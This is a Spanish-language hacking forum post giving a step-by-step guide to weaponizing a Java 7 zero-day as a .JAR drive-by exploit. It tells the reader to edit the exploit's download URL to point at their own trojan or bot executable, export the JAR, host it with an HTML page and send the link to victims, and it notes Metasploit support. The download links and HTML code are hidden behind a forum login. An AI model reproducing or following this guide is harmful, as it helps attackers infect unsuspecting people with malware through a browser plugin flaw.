Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked Explotando Java7 0day - Exploit .JAR by CalebBucker


sQuo

Recommended Posts

This is the hidden content, please

 

Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

 

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

 

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

 

Empecemos.

 

Descargamos el Exploit:

This is the hidden content, please

Pass: calebbucker

 

Necesitaremos el Programa Eclipse:

This is the hidden content, please

Disponible 32 y 64 bits, descargue dependiendo de su S.O

 

Instalamos JAVA 7:

This is the hidden content, please

 

Iniciamos Eclipse, seleccionamos File - Import:

 

This is the hidden content, please

 

Seleccionamos General - Proyectos Existentes en el Área de Trabajo:

 

This is the hidden content, please

 

Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2

 

This is the hidden content, please

 

Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo Gondvv.java y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("http://www.sitio-web.com/file.exe");

 

This is the hidden content, please

 

Ahora, abrimos el archivo applet1.java y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.

 

This is the hidden content, please

 

This is the hidden content, please

 

Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:

 

This is the hidden content, please

 

El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:

 

This is the hidden content, please

 

Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar

 

This is the hidden content, please

 

Terminado ese paso le damos Next, Next y Finish.

 

Ahora, creamos un archivo html con el siguiente código:

 

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrese.

 

 

En mi caso el codigo queda de la siguiente manera:

 

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrese.

 

 

This is the hidden content, please

 

Esos archivos la subimos en nuestro Host, de preferencia de pago.

 

Ahora solo queda enviar el link:

This is the hidden content, please
a cualquier persona.

 

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado :(

 

This is the hidden content, please

 

Esta vulnerabilidad también puede ser explotada desde Metasploit:

This is the hidden content, please

 

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

 

Saludos.

Autor: CalebBucker

This is the hidden content, please

Link to comment
Share on other sites

  • 1 month later...
  • 1 month later...
Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.